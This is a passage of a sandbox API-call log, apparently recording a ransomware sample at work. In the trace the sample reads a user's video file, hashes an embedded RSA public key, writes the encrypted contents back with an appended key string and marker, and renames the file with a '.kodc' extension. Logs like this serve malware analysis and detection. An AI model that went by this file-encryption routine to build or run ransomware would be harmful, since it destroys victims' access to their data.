lpFileSize=0x9e2fb40*=92188) returned 1 [0100.154] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.157] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x167f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.157] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.158] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.158] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1681c, lpOverlapped=0x0) returned 1 [0100.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.159] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.160] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.160] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.160] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.161] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.161] GetLastError () returned 0x0 [0100.161] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.161] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.161] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.161] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.161] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16820) returned 0x9bb8968 [0100.162] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c418 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c460 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.163] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c20 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c08 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.164] GetCurrentThreadId () returned 0x42c [0100.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6788 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.165] GetCurrentThreadId () returned 0x42c [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c20 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c38 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c460 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.170] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x16817, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x16817, lpOverlapped=0x0) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.170] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1681c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.170] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.171] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.171] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.171] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.171] CloseHandle (hObject=0x5cc) returned 1 [0100.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.172] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Jg7ye.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jg7ye.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Jg7ye.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jg7ye.flv.kodc")) returned 1 [0100.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.173] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.174] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4870b60, ftCreationTime.dwHighDateTime=0x1d5b644, ftLastAccessTime.dwLowDateTime=0x35935c30, ftLastAccessTime.dwHighDateTime=0x1d5c0ae, ftLastWriteTime.dwLowDateTime=0x35935c30, ftLastWriteTime.dwHighDateTime=0x1d5c0ae, 